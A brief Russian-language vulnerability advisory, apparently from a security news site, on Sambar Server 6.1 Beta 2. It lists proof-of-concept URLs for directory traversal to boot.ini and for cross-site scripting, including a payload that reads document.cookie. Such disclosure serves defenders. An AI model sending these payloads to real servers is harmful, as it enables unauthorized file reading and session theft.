Программа: Sambar Server 6.1 Beta 2 

Несколько уязвимостей обнаружено в Sambar Server. Удаленный авторизованный администратор может просматривать файлы, расположенные вне Sambar Server директории. Удаленный пользователь также может выполнить XSS нападение. 

1. Раскрытие файлов: 

http://myserver/sysadmin/system/showini.asp? file=\..\..\..\..\..\..\..\boot.ini
http://localhost/sys admin/system/showlog.asp? log=c:\boot.ini&tail=y

По умолчанию, администрировать Sambar возможно только с
localhost. 

2. XSS: 

http://localhost/sysadmin/system/show.asp?show= <script>alert("oops")</script>
http://localhost/sysadmin/system/showperf.asp?area= search&title=<script>alert(document.cookie)</script>

Оставить мнение